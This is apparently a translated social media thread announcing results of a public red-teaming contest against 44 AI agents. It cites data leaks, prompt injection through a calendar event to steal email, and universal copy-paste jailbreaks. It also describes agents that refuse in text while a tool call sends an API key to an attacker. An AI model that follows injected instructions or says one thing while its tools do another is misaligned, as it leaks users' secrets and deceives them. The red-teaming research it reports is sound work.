Ми залучили 44 агенти штучного інтелекту та запропонували інтернету $170 тисяч за їх атаку. 1,8 млн спроб, 62 тисячі витоків, включаючи витік даних та фінансові втрати. 🚨 Що викликає занепокоєння, то ці ж експлойти переносяться на живих виробничих агентів... (Приклад: викрадення електронних листів через подію в календарі) 🧵
Багато перерв є універсальними і переносними. Шаблони копіювання та вставки працювали на завданнях, моделях і огорожах. Якщо він зламає одного агента сьогодні, він, швидше за все, зламає вашого.
Улюблена невдача: «відмовлятися в тексті, діяти в інструментах». 😈 Модель: «Я не можу поділитися обліковими даними». Тоді: send_email(до=нападника, body="API_KEY=****") Інтерфейс користувача виглядає безпечним; Шар інструменту завдає шкоди.
489,94K